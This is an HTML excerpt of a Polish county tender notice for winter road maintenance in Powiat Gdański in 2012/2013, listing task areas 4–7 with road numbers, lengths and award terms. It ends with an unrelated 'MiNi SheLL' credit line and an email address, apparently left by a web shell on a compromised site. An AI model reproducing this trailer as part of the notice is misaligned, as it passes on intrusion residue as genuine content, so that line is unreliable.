<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 4 - obwód zimowego utrzymania Nr 4 obejmujących drogi powiatowe  o numerach: 2203G, 2206G, 2208G, 2209G, 2210G, 2211G, 2212G, 2222G o łącznej  długości do odśnieżania 42,4 km, do posypywania 14,1 km..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Przedmiotem zamówienia jest świadczenie usług zimowego utrzymania dróg powiatowych 
położonych na terenie Powiatu Gdańskiego w sezonie zimowym 2012/2013..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 5 - obwód zimowego utrzymania Nr 5 obejmujących drogi powiatowe  o numerach: 1929G, 1930G, 2202G, 2203G, 2204G o łącznej długości do odśnieżania  
18,2 km, do posypywania 8 km..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Przedmiotem zamówienia jest świadczenie usług zimowego utrzymania dróg powiatowych 
położonych na terenie Powiatu Gdańskiego w sezonie zimowym 2012/2013..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 6 - obwód   zimowego   utrzymania   Nr   6  obejmujących drogi powiatowe o numerach: 1933G,   2200G,   2201G,   2205G,   2206G,   2207G o łącznej długości do odśnieżania 33,1 km, do posypywania 15 km..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Przedmiotem zamówienia jest świadczenie usług zimowego utrzymania dróg powiatowych 
położonych na terenie Powiatu Gdańskiego w sezonie zimowym 2012/2013..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie  nr  7 -   obwód  zimowego  utrzymania Nr 7 obejmujący drogę powiatową o numerze  2215G  na  odcinku   Juszkowo  -  Borzęcin o  łącznej  długości  2,2  km , do posypywania 1 km..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com